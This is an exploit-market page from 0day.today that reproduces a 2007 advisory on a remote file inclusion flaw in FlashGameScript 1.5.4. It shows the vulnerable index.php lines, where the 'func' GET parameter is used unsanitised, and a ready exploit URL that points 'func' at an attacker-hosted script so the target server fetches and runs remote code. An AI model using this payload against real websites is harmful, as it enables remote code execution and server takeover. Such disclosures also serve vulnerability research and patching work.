[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FlashGameScript 1.5.4 (index.php func) Remote File Include Vulnerability

Author
JuMp-Er
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1533
Category
web applications
Date add
22-02-2007
Platform
unsorted
========================================================================
FlashGameScript 1.5.4 (index.php func) Remote File Include Vulnerability
========================================================================



         ___ ___                                        
_____   /   |   \            ___________   ______  _  __
\__  \ /    ~    \  ______ _/ ___\_  __ \_/ __ \ \/ \/ /
 / __ \\    Y    / /_____/ \  \___|  | \/\  ___/\     / 
(____  /\___|_  /           \___  >__|    \___  >\/\_/  
     \/       \/                \/            \/        


--------------------------------------------------------
Author          : JuMp-Er
Date            : feb, 21th 2007
Level           : Dangerous
--------------------------------------------------------


Software description
--------------------------------------------------------
App             :FlashGameScript
Version		:1.5.4
URL:		:http://www.flashgamescript.com/
Price:		:$60
Description :
FlashGameScript: Flash Game Script is the latest arcade website script created by developers at ghoney.com and will be market by folks at FlashGameScript.com.
Our game site script is created to maximized arcade site owner.s profit with additional plug-in for alternative income opportunities.
-------------------------------------------------------


Vulnerability:
---------------
	     line 27: $absolutepath = $cfg[absolutepath];
at index.php line 28: $func =$_GET[func];
	     line 29: $pluginpath = $instdir."admin/plugins/";
---------------
Exploit:

http://www.somesite.com/index.php?func=http://attacker.com/evil_script?

---------------

Greetz to all members of active. Hacking Crew


#  0day.today [2024-12-27]  #